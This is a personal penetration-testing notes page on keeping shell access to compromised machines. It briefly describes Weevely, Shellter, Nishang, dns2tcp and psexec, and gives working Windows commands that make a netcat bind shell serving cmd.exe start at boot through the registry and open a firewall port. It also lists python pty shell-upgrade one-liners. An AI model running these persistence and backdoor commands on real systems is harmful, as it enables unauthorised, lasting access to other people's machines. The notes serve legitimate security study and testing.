akde/infosec

Information security is ultimately about managing risk

Maintain shell access

, , ,

Weevely

https://tools.kali.org/maintaining-access/weevely

Erzeugt PHP-Skript auf Serv­er, mit dem man eine Shell wieder bekom­men kann.

Various scripts

Shelter (win32)

Dynam­ic shell injec­tion tool into nor­mal Win­dows binaries.

https://tools.kali.org/maintaining-access/shellter

Create own (normal) shell

  • Cre­ate a open shell via netcat.
  • Cre­ate a open shell via dbd (https://tools.kali.org/maintaining-access/shellter)

HTTPTunnel

Needs PHP; cre­ates file on a serv­er which acts as SSH proxy.

Nishang

Col­lec­tion of Pow­er­Shell scripts for back­doors and more.

Kali:/usr/share/nishang

dns2tcp

Cre­ates a TCP tun­nel via a DNS server.

psexec

Use psex­ec from Impack­et to cre­ate a reg­u­lar­ly run­ning script.

Windows

Autostart nc

  1. Upload nc to the serv­er (e.g. from /usr/share/windows-binaries/nc.exe)
    Set the autorun reg­istry entry:
    REG ADD HKLM\software\microsoft\windows\currentversion\run /v “nc” /t REG_SZ /d “C:\Users\w7vm\Desktop\nc.exe ‑Ldp 4488 ‑e cmd.exe”
  2.  Add a new fire­wall rule
    netsh fire­wall add por­topen­ing TCP 4488 “Ser­vice Fire­wall” ENABLE ALL
  3. Dou­ble check that the rule is active now
    netsh fire­wall show portopening

Warn­ing: Could be that Win­dows shows a con­fir­ma­tion pop­up on start­ing before start­ing nectar.

Leave a Reply

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';